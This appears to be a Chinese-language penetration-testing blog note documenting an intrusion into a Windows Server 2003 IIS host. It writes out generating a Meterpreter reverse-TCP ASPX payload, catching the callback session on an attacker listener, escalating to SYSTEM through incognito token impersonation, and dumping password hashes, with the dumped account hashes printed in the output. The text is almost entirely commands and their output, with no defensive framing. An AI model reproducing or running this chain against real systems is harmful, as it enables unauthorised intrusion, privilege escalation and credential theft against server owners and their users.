这篇笔记是继《记一次MS14-058到域控实战记录》之后写的,测试的是同一台服务器。在后续的测试中发现除了可以用ms14_058_track_popup_menu提权外,还可以利用Meterpreter中的incognito拓展进行令牌假冒来获取目标机器SYSTEM权限,这里就不再做过多文字描述了。

0x01 生成载荷文件

  1. root@c2unix:~# msfpayload windows/meterpreter/reverse_tcp LHOST=1x3.2x1.x0.1x8 LPORT=443 R | msfencode -t aspx -o /media/sf_Temp/test.aspx

0x02 获取目标会话

  1. root@c2unix:~# msfconsole
  2. msf > use exploit/multi/handler
  3. msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
  4. msf exploit(handler) > set lhost 192.168.1.10
  5. msf exploit(handler) > set lport 443
  6. msf exploit(handler) > exploit
  8. [*] Started reverse handler on 192.168.1.10:443
  9. [*] Starting the payload handler...
  10. [*] Sending stage (770048 bytes) to 216.**.***.9
  11. [*] Meterpreter session 1 opened (192.168.1.10:443 -> 216.**.***.9:2159) at 2014-12-29 04:11:44 +0800

1.png

0x03 令牌假冒提权

(1) 查看当前权限和系统信息

  1. meterpreter > getuid
  2. Server username: TRESSA\IWPD_194(lobom0)
  3. meterpreter > getsystem
  4. [-] priv_elevate_getsystem: Operation failed: Access is denied.
  5. meterpreter > sysinfo
  6. Computer        : TRESSA
  7. OS              : Windows .NET Server (Build 3790, Service Pack 2).
  8. Architecture    : x86
  9. System Language : en_US
  10. Meterpreter     : x86/win32

(2) 加载扩展和查看可用令牌

  1. meterpreter > use incognito
  2. Loading extension incognito...success.
  4. meterpreter > list_tokens  -u
  5. [-] Warning: Not currently running as SYSTEM, not all tokens will be available
  6.              Call rev2self if primary process token is SYSTEM
  8. Delegation Tokens Available
  9. ========================================
  10. NT AUTHORITY\SYSTEM
  11. TRESSA\IUSR_lobom0
  12. TRESSA\IWPD_194(lobom0)
  14. Impersonation Tokens Available
  15. ========================================
  16. No tokens available
  18. meterpreter > list_tokens  -g
  19. [-] Warning: Not currently running as SYSTEM, not all tokens will be available
  20.              Call rev2self if primary process token is SYSTEM
  22. Delegation Tokens Available
  23. ========================================
  24. BUILTIN\Administrators
  25. BUILTIN\Users
  26. NT AUTHORITY\Authenticated Users
  27. NT AUTHORITY\BATCH
  28. NT AUTHORITY\NETWORK
  29. NT AUTHORITY\NTLM Authentication
  30. NT AUTHORITY\This Organization
  31. TRESSA\IIS_WPG
  32. TRESSA\psacln
  34. Impersonation Tokens Available
  35. ========================================
  36. No tokens available

(3) 假冒可用令牌和获取哈希

  1. meterpreter > impersonate_token BUILTIN\\Administrators
  2. [-] Warning: Not currently running as SYSTEM, not all tokens will be available
  3.              Call rev2self if primary process token is SYSTEM
  4. [+] Delegation token available
  5. [+] Successfully impersonated user NT AUTHORITY\SYSTEM
  6. meterpreter > getuid
  7. Server username: NT AUTHORITY\SYSTEM
  8. meterpreter > hashdump
  9. 0D0AF93A975141ffB:7440:aad3b435b51404eeaad3b435b51404ee:4bdf90abd3a6eaf4fc0b906007a0da65:::
  10. acecorban:10541:d9054b662f191c77944e2df489a880e4:0f5ba283eb09df1ca0da7e3dc447ed24:::
  11. Admin:8620:68c4bbe07b4f858f4207fd0df35a59a8:e1bd0227de8074466c2941d8edf46cd5:::
  12. admin48:9789:740c21d1e025f184b47967426f365f48:ca76880726e624b5ac6b2e8645cd21e2:::
  13. ......

2.png

public.png